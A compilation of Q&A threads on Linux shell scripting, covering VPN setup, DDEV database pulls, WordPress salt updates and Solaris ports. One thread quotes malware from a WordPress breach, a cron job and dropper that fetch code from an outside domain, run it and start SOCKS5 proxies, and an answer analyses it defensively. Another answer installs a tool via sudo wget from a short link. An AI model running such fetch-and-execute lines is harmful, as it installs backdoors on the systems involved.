NordVPN setup on linux - vpn

NordVPN does not offer an automatic setup for linux, just VPN config files. What's the best way to implement this?
(my own implementation below, please feel free to comment or suggest improvements!)
EDIT: When I wrote this, I did not know that NordVPN did introduce a command line tool for linux recently.

I have written a little script that downloads the config files, renames them and enables automatic authentification. Insert your NordVPN login credentials in the generate authentification file part.
#!/bin/bash
# run as root!!!
# install openvpn. I'm running arch, this might be different on your system.
pacman -S openvpn
# go to openvpn config folder
cd /etc/openvpn
# download config files, extract and clean up
wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
unzip ovpn.zip
rm ovpn.zip
# rename tcp config files and put them in /etc/openvpn/client
cd ovpn_tcp
for file in *; do mv "${file}" "${file/.nordvpn.com.tcp.ovpn/}tcp.conf"; done
cp * ../client
# rename udp config files and put them in /etc/openvpn/client
cd ../ovpn_udp
for file in *; do mv "${file}" "${file/.nordvpn.com.udp.ovpn/}udp.conf"; done
cp * ../client
# generate authentification file
cd ../client
printf "<your email>\n<your password>" > auth.txt
# make all configs use authentification file
find . -name '*.conf' -exec sed -i -e 's/auth-user-pass/auth-user-pass\ auth.txt/g' {} \;
# clean up
cd ..
rm -r ovpn_tcp/
rm -r ovpn_udp
You can now start and stop vpn-connections via e.g.
systemctl start openvpn-client#de415tcp.service
and
systemctl stop openvpn-client#de415tcp.service
To automate this, and to connect to the server recommended by NordVPN, I have written two scripts. Make them executable and put them somewhere in your $PATH.
Pass a country code (like us, de or uk) as command line argument to start-vpn if you want to choose a specific country. It automatically chooses a tcp connection. You can change that to udp if you want.
start-vpn
#!/usr/bin/python
import sys
import requests
import os
import time
# you don't necessarily need the following. It's for monitoring via i3blocks.
def notify_i3blocks():
os.system('pkill -RTMIN+12 i3blocks')
def fork_and_continue_notifying_in_background():
newpid = os.fork()
if newpid == 0: # if this is the child process
for i in range(60):
notify_i3blocks()
time.sleep(1)
if __name__ == '__main__':
notify_i3blocks()
# below is what you do need.
suffix = ''
if len(sys.argv) > 1:
countries = requests.get('https://nordvpn.com/wp-admin/admin-ajax.php?action=servers_countries').json()
for country in countries:
if country["code"].lower() == sys.argv[1].lower():
suffix = '&filters={"country_id":' + str(country["id"]) + '}'
result = requests.get('https://nordvpn.com/wp-admin/admin-ajax.php?action=servers_recommendations' + suffix)
profile = result.json()[0]['subdomain'] + 'tcp'
command = 'systemctl start openvpn-client#' + profile + '.service'
os.system(command)
# the following is for i3blocks again.
fork_and_continue_notifying_in_background()
stop-vpn
#!/bin/bash
function service {
systemctl |
grep openvpn |
grep running |
head -n1 |
awk '{print $1;}'
}
while [[ $(service) ]]; do
systemctl stop $(service)
done
# notify i3blocks
pkill -RTMIN+12 i3blocks
For convenience, I have two aliases in my ~/.bashrc:
alias start-vpn='sudo start-vpn'
alias stop-vpn='sudo stop-vpn'
if you do want to monitor it via i3blocks, put this in your i3blocks config:
[vpn]
interval=once
signal=12
and this in your i3blocks-scripts-directory (with name vpn):
#!/bin/bash
function name {
systemctl |
grep openvpn |
grep running |
head -n1 |
awk '{print $1;}' |
cut -d # -f 2 |
cut -d . -f 1
}
starting=$(pgrep -f start-vpn) # this might not be the most accurate, but it works for me. Improvement suggestions are welcomed.
if [[ $(name) ]]; then
echo $(name)
echo && echo "#00FF00"
else
if [[ ${starting} ]]; then
echo starting vpn...
echo && echo "#FFFF00"
else
echo no vpn
echo && echo "#FF0000"
fi
fi
In order to automatically start and stop vpn when a network interface goes up/down, put the following in /etc/NetworkManager/dispatcher.d/10-openvpn. To activate the feature you need to enable and start the NetworkManager-dispatcher.service. More info here.
At my university, I connect to eduroam, which does not allow vpn. That's why I exclude that.
/etc/NetworkManager/dispatcher.d/10-openvpn
#!/bin/bash
case "$2" in
up)
if ! nmcli -t connection | grep eduroam | grep wlp3s0 ; then
start-vpn
fi
;;
down)
stop-vpn
;;
esac
I hope this helps other people who want to use NordVPN on linux. Again, feel free to comment and suggest improvements.
In particular, I am not sure how much of a security risk it is to have the NordVPN-password written out in plain text in a file.

Related

DDEV multisite setup with Acquia pull

I've just gotten DDEV setup and I have multisite working by manually running ddev import-db --target-db=[db-name]. It's working just fine but I would like to figure out how to get database pulls from Acquia to work where I can specify the site to pull from.
I have this script working but is there a way to do this with DDEV commands that would be a little cleaner?
First I modified acquia.yaml to this:
environment_variables:
project_id: mysite.dev
uri: mysite.com
db_name: mysite_us
#uri: mysite.ca
#db_name: mysite_canada
#uri: mysite.co.uk
#db_name: mysite_unitedkingdom
# etc etc
db_pull_command:
command: |
# set -x # You can enable bash debugging output by uncommenting
ls /var/www/html/.ddev >/dev/null # This just refreshes stale NFS if possible
pushd /var/www/html/.ddev/.downloads >/dev/null
acli remote:drush -n ${project_id} -- sql-dump --extra-dump=--no-tablespaces --uri=${uri} >${db_name}.sql
Then I wrote the following script which i call like:
./ddev-refresh-db.sh mysite_us mysite.com
#!/bin/bash
site="$1"
uri="$2"
ddev pull acquia
ddev import-db --target-db=${site} --src=.ddev/.downloads/${site}.sql
ddev drush --uri=${uri} cr
However this still requires us to change the site and URI in the acquia.yaml file before running this command.
Is there a way to pass a variable through to ddev pull acquia ? And also a way to mimic what this script is doing with a real DDEV command?
Here's a more complete answer for Acquia multisite pull, pulling all sites. As of DDEV v1.18.0, the ddev pull itself really isn't robust enough to pull multiple sites, because it assumes one database and one set of files. This works where #kelly howard's answer in https://stackoverflow.com/a/68553116/215713 is inadequate. (In her example, she pulls just one of the multisites, and it works great for that situation.)
But here we'll put all the logic in a DDEV custom command and pull all databases and files for any named site, so ddev acquiapull <sitename>
Place this file in the project as .ddev/commands/web/acquiapull
#!/bin/bash
# This DDEV custom command is set up to pull database and files from Acquia for several subsites.
# Usage: `ddev acquiapull [ --skip-db ] [ --skip-files ] <site1> <site2>
# Example: `ddev acquiapull subsite1`
# This assumes that each subsite has its own database (named for the site)
# and that each subsite has its own files in sites/<sitename>/files
# To use it set up the needed ACQUIA_API_KEY and ACQUIA_API_SECRET in global
# or project config, just as described in
# https://ddev.readthedocs.io/en/stable/users/providers/acquia/
acquia_project_id=myprojectid.dev
tmpdir=/tmp #inside web container
set -eu -o pipefail
while :; do
case ${1:-} in
-h | -\? | --help)
show_help
exit
;;
-y|--yes)
SKIP_CONFIRMATION=true
;;
--skip-files)
SKIP_FILES=true
;;
--skip-db)
SKIP_DB=true
;;
--) # End of all options.
shift
break
;;
-?*)
printf 'WARN: Unknown option (ignored): %s\n' "$1" >&2
;;
*) # Default case: No more options, so break out of the loop.
break ;;
esac
shift
done
# Map sitename to database name
function target_db_name() {
site_name=$1
echo $site_name
}
# Map sitename to files dir
function target_files_dir() {
site_name=$1
echo "sites/${site_name}/files"
}
# Get the files from upstream and load them.
function files_pull() {
#set -x # You can enable bash debugging output by uncommenting
set -eu -o pipefail
site_name=$1
files_dir=$(target_files_dir $1)
mkdir -p ${DDEV_DOCROOT}/${files_dir}/
echo "Using drush rsync to update files for ${site_name}..."
drush rsync --alias-path=~/.drush -q -y -r ${DDEV_DOCROOT} --verbose #${acquia_project_id}:${files_dir}/ ${DDEV_DOCROOT}/${files_dir}/
}
# Get the db from upstream and load it
function db_pull() {
#set -x # You can enable bash debugging output by uncommenting
set -eu -o pipefail
site_name=$1
target_db=$(target_db_name ${site_name})
echo "Downloading ${site_name} database..."
acli remote:drush -n ${acquia_project_id} -- sql-dump --uri=${site_name} --extra-dump=--no-tablespaces >${tmpdir}/${site_name}.sql
echo "Loading ${site_name} into database '${target_db}'..."
mysql -uroot -proot -e "CREATE DATABASE IF NOT EXISTS ${target_db}; GRANT ALL ON ${target_db}.* TO 'db'#'%'"
mysql -uroot -proot ${target_db} <${tmpdir}/${site_name}.sql
drush -r root --uri=${site_name} cr
}
# Handle initial authentication via Acquia secrets and ssh
function authenticate() {
if [ -z "${ACQUIA_API_KEY:-}" ] || [ -z "${ACQUIA_API_SECRET:-}" ]; then echo "Please make sure you have set ACQUIA_API_KEY and ACQUIA_API_SECRET in your project or global config" && exit 1; fi
if ! command -v drush >/dev/null; then echo "Please make sure your project contains drush, ddev composer require drush/drush" && exit 1; fi
ssh-add -l >/dev/null || (echo "Please 'ddev auth ssh' before running this command." && exit 1)
acli auth:login -n --key="${ACQUIA_API_KEY}" --secret="${ACQUIA_API_SECRET}"
acli remote:aliases:download -n >/dev/null
}
# Main script
authenticate || (printf "Failed to authenticate" && exit $?)
if [ $# -eq 0 ]; then
printf "Usage: ddev acquiapull [ --skip-db ] [ --skip-files ] <sitename>"
exit 1
fi
if [ ${SKIP_CONFIRMATION:-} != "true" ]; then
echo "This will overwrite your database and files for sites $*. OK?"
select yn in "Yes" "No"; do
case $yn in
No ) exit;;
esac
done
fi
for subsite in $*; do
echo "Pulling subsite: $subsite"
if [ "${SKIP_DB:-}" != "true" ]; then
db_pull ${subsite} || (printf "Failed to pull db for ${subsite}" && exit $?)
else
echo "Skipping db pull for ${subsite}"
fi
if [ "${SKIP_FILES:-}" != "true" ]; then
files_pull ${subsite} || (printf "Failed to pull files for ${subsite}" && exit $?)
else
echo "Skipping files pull for ${subsite}"
fi
done
Thanks to the guidance from #rfay I set up a set of files in .ddev/providers for each country. Each one is structured like this:
environment_variables:
uri: mysite.be
db_name: belgium
auth_command:
command: |
<no changes>
db_pull_command:
command: |
# set -x # You can enable bash debugging output by uncommenting
ls /var/www/html/.ddev >/dev/null # This just refreshes stale NFS if possible
pushd /var/www/html/.ddev/.downloads >/dev/null
acli remote:drush -n ${ACQUIA_PROJECT_ID} -- sql-dump --extra-dump=--no-tablespaces --uri=${uri} >${db_name}.sql
Then I created a custom command in .ddev/commands/host that has the contents of my script. There are more cases in the real script to cover all the countries.
#!/usr/bin/env bash
## Description: Refresh a database from Acquia and run post-db commands
## Usage: refresh-db [dbname]
## Example: "ddev refresh-db france"
site="$1"
case $site in
canada)
uri="mysite.ca"
;;
australia)
uri="mysite.com.au"
;;
belgium)
uri="mysite.be"
;;
brazil)
uri="mysite.com.br"
;;
*)
site="db"
uri="mysite.com"
;;
esac
ddev pull ${site} -y 2>/dev/null # suppress pull failed message since it really didn't
ddev import-db --target-db=${site} --src=${DDEV_APPROOT}/.ddev/.downloads/${site}.sql
ddev drush --uri=${uri} cr
ddev drush --uri=${uri} -y pmu simplesamlphp_auth
ddev drush --uri=${uri} -y config-set system.performance css.preprocess 0
ddev drush --uri=${uri} -y config-set system.performance js.preprocess 0
I tried to handle the db import during the db_pull_command as suggested but I couldn't get past database permission errors for importing a DB that I had not already imported using ddev import-db. However with the custom command I can also incorporate the post-db-import steps that normally would only run against the default DB if done through config.yaml.
The other change I made was to move the project ID into the web environment settings in global_config.yaml file. This way if we want to change the environment we want to pull from, we just make an edit to the project ID there and don't have to edit the provider files.
I'm not experienced with contributing back to open source projects but if this can be helpful to others I'd love to work with someone to do that pull request on the documentation or wherever it belongs.
I'm going to go ahead and answer in general, but you can add a full answer when you get this sorted out. (I don't have access to an Acquia multisite.)
You're on the right track, but you can do all of this in the pull script. The problem you're having is that ddev just assumes a single database, and you have multiple.
Here's a strategy for your acquia.yaml:
Create all the databases. You can use mysql -e "CREATE DATABASE IF NOT EXISTS <dbname>;, use several lines or a for loop.
Pull all the databases. You can do this with separate acli lines, or use a for loop.
Import the databases that aren't the primary db using the mysql command. mysql <dbname> < <dbname.sql Again, this can be a few lines or a for loop. (You can also just import the primary db and it will just be re-imported by ddev, no harm done if it's not large.)
Thanks for the great question, and I hope you'll give a full answer here. Your answer could also be incorporated into https://ddev.readthedocs.io/en/stable/users/providers/acquia/ - you could do a PR there by clicking the pencil link at the upper right.

some malware that appeared on our site related to the recent wordpress attack

Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try to execute this...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line. I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and see if you see that command. If you do it, use the kill command to stop it.

sh script: no output when run in mounted filesystem

Need some help to understand what's wrong.
In short: I've written a bourne shell script, which creates links to contents of source directory in the target directory.
It worked fine on the host system but when targeted on directories on mounted fs (both from chroot and native system) it doesn't work and provides no output at all.
Details:
mounted fs: ext3, rw
host system: 3.2.0-48-generic #74-Ubuntu SMP GNU/Linux
To narrow the question, "/usr" was taken as an example.
permissions for "/usr" in the host system: drwxr-xr-x
permissions for "/usr" on mounted partition: drwxr-xr-x
Tried to use both bash and dash from host system. Same result - works for native file systems, does not work for the mounted.
script (cord.sh; run from root in my cases):
# !/bin/sh
SRCFOLDER=$2 # folder with package installation
DESTFOLDER=$3 # destination folder to install symlinks to ('/' - for base sys; '/usr' - userland)
TARGETS=$(ls $SRCFOLDER) # targets to handle
SRCFOLDER=${SRCFOLDER%/} # stripping slashes from the end, if they are present
DESTFOLDER=${DESTFOLDER%/} #
##
## LINKING
##
if [ "$1" = "-c" ];
then printf %s "$TARGETS" | while IFS= read -r line
do
current_target=$(file $SRCFOLDER/$line) # had an issue with different output in different systems
if [ "${current_target% }" = "$SRCFOLDER/$line: directory" ]; # stripping space helped
then
mkdir -v $DESTFOLDER/$line # if other package created it - it'll fail
/usr/local/bin/cord.sh -c $SRCFOLDER/$line $DESTFOLDER/$line # RECURSION
else
ln -sv $SRCFOLDER/$line $DESTFOLDER/$line # will fail, if exists
fi;
done
##
## REMOVING LINKS
##
elif [ "$1" = "-d" ];
then printf %s "$TARGETS" | while IFS= read -r line
do
current_target=$(file $SRCFOLDER/$line)
if [ "${current_target% }" = "$SRCFOLDER/$line: directory" ];
then
/usr/local/bin/cord.sh -d $SRCFOLDER/$line $DESTFOLDER/$line # RECURSION
else
rm -v $DESTFOLDER/$line
fi;
done
elif [ "$1" = "-h" ];
then
echo "Usage:"
echo "cord -c /path/to/pkgdir /path/to/linkdir - create simlinks for package contents"
echo "cord -d /path/to/pkgdir /path/to/linkdir - delete links for package"
echo "cord -h - displays this help note"
else
echo "Usage:"
echo "cord -c /path/to/pkgdir /path/to/linkdir - create simlinks for package contents"
echo "cord -d /path/to/pkgdir /path/to/linkdir - delete links for package"
echo "cord -h - displays this help note"
fi;
The most obvious thing to suggest, was some issue with permissions. Yet everything looks sane. Maybe I've missed something?
I don't know what your main problem might be (permissions or something else - you should include an example of how you run the script and how you prepare for it with the mounts and everything). But this script can be cleaned up.
First, if you want to test whether something is a directory, use
if [ -d "$something ]
That'll get rid of the clumsy file usage.
Second, don't go through the redundant steps of converting your $TARGETS array to a series of lines and then reading the lines with a loop. Just loop over the array directly.
for line in $TARGETS
Also, instead of using ls to populate an array of filenames, I'd use a glob. But instead of either of those, I'd use find so it can take care of recursion and eliminate the tree of processes you're creating by recursing with a call to the same script. And instead of writing a symlink-tree-maker script I'd use something like lndir which already exists for that purpose...

Download and insert salt string inside wordpress wp-config.php with Bash

How can I insert the content of the variable $SALT in a specific point (line or string) of a file like wp-contet.php from wordpress using Bash script?
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
I'm not an expert at parsing text files in bash but you should delete the lines that define the things you're downloading from the wordpress salt and then insert the variable at the end... something like:
#!/bin/sh
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
STRING='put your unique phrase here'
printf '%s\n' "g/$STRING/d" a "$SALT" . w | ed -s wp-config.php
OK, now it's fixed... it should look for where the salt is supposed to go and it will replace it with the info retrieved from https://api.wordpress.org/secret-key/1.1/salt/
This version defines new keys if none exist, and also replaces existing keys:
#!/bin/bash
find . -name wp-config.php -print | while read line
do
curl http://api.wordpress.org/secret-key/1.1/salt/ > wp_keys.txt
sed -i.bak -e '/put your unique phrase here/d' -e \
'/AUTH_KEY/d' -e '/SECURE_AUTH_KEY/d' -e '/LOGGED_IN_KEY/d' -e '/NONCE_KEY/d' -e \
'/AUTH_SALT/d' -e '/SECURE_AUTH_SALT/d' -e '/LOGGED_IN_SALT/d' -e '/NONCE_SALT/d' $line
cat wp_keys.txt >> $line
rm wp_keys.txt
done
If you have csplit available, you can split the original wp-config.php file either side of the salt definitions, download new salts, then cat back together. This keeps the PHP define() statements at the same location in wp-config.php instead of than moving them to a different location within the file:
# Download new salts
curl "https://api.wordpress.org/secret-key/1.1/salt/" -o salts
# Split wp-config.php into 3 on the first and last definition statements
csplit wp-config.php '/AUTH_KEY/' '/NONCE_SALT/+1'
# Recombine the first part, the new salts and the last part
cat xx00 salts xx02 > wp-config.php
# Tidy up
rm salts xx00 xx01 xx02
How about using sed?
cat wp-config.php | sed 's/old_string/new_string/g' > wp-config.php
I think I got this one! its a bash script using only commands normally available at the command prompt and it does -everything- (assuming httpd is your web user) except create the databases. here you go.
#!/bin/bash
# wordpress latest auto-install script, by alienation 24 jan 2013. run as root.
# usage: ~/wp-install alien /hsphere/local/home/alien/nettrip.org alien_wpdbname alien_wpdbusername p#sSw0rd
# ( wp-install shell-user folder db-name db-user-name db-user-pw )
# download wordpress to temporary area
cd /tmp
rm -rf tmpwp
mkdir tmpwp
cd tmpwp
wget http://wordpress.org/latest.tar.gz
tar -xvzpf latest.tar.gz
# copy wordpress to where it will live, and go there, removing index placeholder if there is one
mv wordpress/* $2
cd $2
rm index.html
# create config from sample, replacing salt example lines with a real salt from online generator
grep -A 1 -B 50 'since 2.6.0' wp-config-sample.php > wp-config.php
wget -O - https://api.wordpress.org/secret-key/1.1/salt/ >> wp-config.php
grep -A 50 -B 3 'Table prefix' wp-config-sample.php >> wp-config.php
# put the appropriate db info in place of placeholders in our new config file
replace 'database_name_here' $3 -- wp-config.php
replace 'username_here' $4 -- wp-config.php
replace 'password_here' $5 -- wp-config.php
# change file ownership and permissions according to ideal at http://codex.wordpress.org/Hardening_WordPress#File_Permissions
touch .htaccess
chown $1:httpd .htaccess
chown -R $1:httpd *
find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \;
chmod -R 770 wp-content
chmod -R g-w wp-admin wp-includes wp-content/plugins
chmod g+w .htaccess
# thats it!
echo ALL DONE
I built a simple CLI for just that. Try it out. It's called [WP-Salts-Update-CLI][1].
WP-Salts-Update-CLI
WPSUCLI downloads new salts from the WP API and replaces them with the ones in your wp-config.php file for every site on your server.
⚡️ Installation
Open command line terminal (I prefer iTerm2) and run the following command.
bash
sudo wget -qO wpsucli https://git.io/vykgu && sudo chmod +x ./wpsucli && sudo install ./wpsucli /usr/local/bin/wpsucli
This command will perform the following actions:
Use sudo permissions
Use wget to download WPSUCLI and rename it to wpsucli
Make the wpsucli executable
Install wpsucli inside /usr/local/bin/ folder.
🙌 Usage
Just run wpsucli and it will update the salts for every wp-config.php file on your server or PC.
This is the bash script that I came up with that works on my Ubuntu server. I modified the examples from above.
Its a bit of brute force in that it will only replace the 8 keys that currently are required and expects the server to return exactly the same length key every time. The script works well for my use case so I thought I would share it.
CONFIG_FILE=wp-config.php
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
SRC="define('AUTH_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'AUTH_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('SECURE_AUTH_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'SECURE_AUTH_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('LOGGED_IN_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'LOGGED_IN_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('NONCE_KEY'"; DST=$(echo $SALT|cat|grep -o define\(\'NONCE_KEY\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('AUTH_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'AUTH_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('SECURE_AUTH_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'SECURE_AUTH_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('LOGGED_IN_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'LOGGED_IN_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
SRC="define('NONCE_SALT'"; DST=$(echo $SALT|cat|grep -o define\(\'NONCE_SALT\'.\\{70\\}); sed -i "/$SRC/c$DST" $CONFIG_FILE
I tried the accepted solution:
#!/bin/sh
SALT=$(curl -L https://api.wordpress.org/secret-key/1.1/salt/)
STRING='put your unique phrase here'
printf '%s\n' "g/$STRING/d" a "$SALT" . w | ed -s wp-config.php
However it does not work perfectly as for some reason it induces the SALTS to "move down" 1 line in the wp-config.php file each time it is used... it is not ideal if you are going to change SALTS automatically like every week, months with cron for example...
A better solution for me was to create a little function that I call in my script.
This function creates a file with the SALTS (deletes it at the end), deletes every lines containing one of the SALTS then just inserts the SALTS contained in the file in place of the initial SALTS.
This works perfectly.
fct_update_salts() {
# Requires website name as target
curl http://api.wordpress.org/secret-key/1.1/salt/ > ~/SALTS.txt
var_initial_path1=`pwd`
cd ~ #going to home directory
# This scripts eliminates successively all SALT entries, replaces the last one by XXX as a marker, places SALTS.txt, below XXX and deletes XXX
sudo sed -i "/SECURE_AUTH_KEY/d" $1/wp-config.php
sudo sed -i "/LOGGED_IN_KEY/d" $1/wp-config.php
sudo sed -i "/NONCE_KEY/d" $1/wp-config.php
sudo sed -i "/AUTH_SALT/d" $1/wp-config.php
sudo sed -i "/SECURE_AUTH_SALT/d" $1/wp-config.php
sudo sed -i "/LOGGED_IN_SALT/d" $1/wp-config.php
sudo sed -i "/NONCE_SALT/d" $1/wp-config.php
sudo sed -i "/AUTH_KEY/cXXX" $1/wp-config.php
sudo sed -i '/XXX/r SALTS.txt' $1/wp-config.php
sudo sed -i "/XXX/d" $1/wp-config.php
echo "SALTS REPLACED BY:"
echo "====================="
cat ~/SALTS.txt
sudo rm -rf ~/SALTS.txt
cd $var_initial_path1
}
The function is to be called in the script like this:
# Reset SALTS
fct_update_salts $SITE_PATH
Where $SITE_PATH="/var/www/html/YOUR_WEBSITE" or whatever path works for you.
I was challenged with the same issue. Here is the script I wrote to replace the salts and keys from ones downloaded from WordPress. You can use it at any time to replace them if/when needed. I run it as sudo, and the script tests for that. If you use an account that can download to the directory and make updates to the wp-config.php file, then you can delete that part of the script.
#!/bin/sh
# update-WordPress-Salts: Updates WordPress Salts
# written by Wayne Woodward 2017
if [ $# -lt 1 ]; then
echo "Usage: update-WordPress-Salts directory"
exit
fi
if [ "$(whoami)" != "root" ]; then
echo "Please run as root (sudo)"
exit
fi
WPPATH=$1
# Update the salts in the config file
# Download salts from WordPress and save them locally
curl http://api.wordpress.org/secret-key/1.1/salt/ > /var/www/$WPPATH/wp-keys.txt
# Iterate through each "Saltname" and append 1 to it
# For a couple names that may match twice like "AUTH_KEY" adds extra 1s to the end
# But that is OK as when this deletes the lines, it uses the same matching pattern
# (Smarter people may fix this)
for SALTNAME in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT
do
sed -i -e "s/$SALTNAME/${SALTNAME}1/g" /var/www/$WPPATH/wp-config.php
done
# Find the line that has the updated AUTH_KEY1 name
# This is so we can insert the file in the same area
line=$(sed -n '/AUTH_KEY1/{=;q}' /var/www/$WPPATH/wp-config.php)
# Insert the file from the WordPress API that we saved into the configuration
sed -i -e "${line}r /var/www/$WPPATH/wp-keys.txt" /var/www/$WPPATH/wp-config.php
# Itererate through the old keys and remove them from the file
for SALTNAME in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT
do
sed -i -e "/${SALTNAME}1/d" /var/www/$WPPATH/wp-config.php
done
# Delete the file downloaded from Wordpress
rm /var/www/$WPPATH/wp-keys.txt
Many of the answers rely on the phrase 'put your unique phrase here' being present in the file, so they do not work when you want to change salts after the first time. There are also some that remove the old definitions and append the new ones at the end. While that does work, it's nice to keep the definitions where you would expect them, right after the comment documenting them. My solution addresses those issues.
I made a few attempts with sed, perl and regex, but there are special characters in the salts and the rest of the config file that tend to mess things up. I ended up using grep to search the document for the unique comment structure that opens and closes the salt definition block, which has the following format:
/**##+
<comment documentation>
*/
<salt definitions>
/**##-*/
Note that if that comment structure is removed or altered, this will no longer work. Here's the script:
#!/bin/bash -e
# Set Default Settings:
file='wp-config.php'
# set up temporary files with automatic removal:
trap "rm -f $file_start $file_end $salt" 0 1 2 3 15
file_start=$(mktemp) || exit 1
file_end=$(mktemp) || exit 1
salt=$(mktemp) || exit 1
function find_line {
# returns the first line number in the file which contains the text
# program exits if text is not found
# $1 : text to search for
# $2 : file in which to search
# $3 (optional) : line at which to start the search
line=$(tail -n +${3:-1} $2 | grep -nm 1 $1 | cut -f1 -d:)
[ -z "$line" ] && exit 1
echo $(($line + ${3:-1} - 1))
}
line=$(find_line "/**##+" "$file")
line=$(find_line "\*/" "$file" "$line")
head -n $line $file > $file_start
line=$(find_line "/**##-\*/" "$file" "$line")
tail -n +$line $file > $file_end
curl -Ls https://api.wordpress.org/secret-key/1.1/salt/ > $salt
(cat $file_start $salt; echo; cat $file_end) > $file
exit 0
Strings containing single asterisks, such as "*/" and "/**##-*/" want to expand to directory lists, so that is why those asterisks are escaped.
Here's a pure bash approach. This does not depend on wordpress.org.
I converted the original wp_generate_password() function used by WordPress to generate salt.
#!/bin/bash
set -e
#
# Generates a random password drawn from the defined set of characters.
# Inspired by WordPress function https://developer.wordpress.org/reference/functions/wp_generate_password/
#
# Parameters
# ----------
# $length
# (ing) (Optional) Length of password to generate.
# Default value: 12
# $special_chars
# (bool) (Optional) Whether to include standard special characters.
# Default value: true
# $extra_special_chars
# (bool) (Optional) Whether to include other special characters. Used when generating secret keys and salts.
# Default value: false
#
function wp_generate_password() {
# Args
length="$(test $1 && echo $1 || echo 12 )"
special_chars="$(test $2 && echo $2 || echo 1 )"
extra_special_chars="$(test $3 && echo $3 || echo 0 )"
chars='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
[[ $special_chars != 0 ]] && chars="$chars"'!##$%^&*()'
[[ $extra_special_chars != 0 ]] && chars="$chars"'-_ []{}<>~`+=,.;:/?|'
password='';
for i in $(seq 1 $length); do
password="${password}${chars:$(( RANDOM % ${#chars} )):1}"
done
echo "$password"
}
You can then just run SALT="$(wp_generate_password 64 1 1)".
Update
I just published a standalone script to generate WP salt values. You can generate the salt values by running ./wp-generate-salt.sh.
If the wordpress.org API generated SALT values are not necessary for your use case, you can use the pwgen to generate keys on the server and insert those into wp-config.php.
for i in {1..8} ;do unique_key="`pwgen -1 -s 64`";sudo sed -i "0,/put your unique phrase here/s/put your unique phrase here/$unique_key/" /srv/www/wordpress/wp-config.php; done
You may need to fix the ownership of the file after using sudo. You can use a command similar to this for changing the ownership.
chown www-data:www-data /srv/www/wordpress/wp-config.php

What process is listening on a certain port on Solaris?

So I log into a Solaris box, try to start Apache, and find that there is already a process listening on port 80, and it's not Apache. Our boxes don't have lsof installed, so I can't query with that. I guess I could do:
pfiles `ls /proc` | less
and look for "port: 80", but if anyone has a better solution, I'm all ears! Even better if I can look for the listening process without being root. I'm open to both shell and C solutions; I wouldn't mind having a little custom executable to carry with me for the next time this comes up.
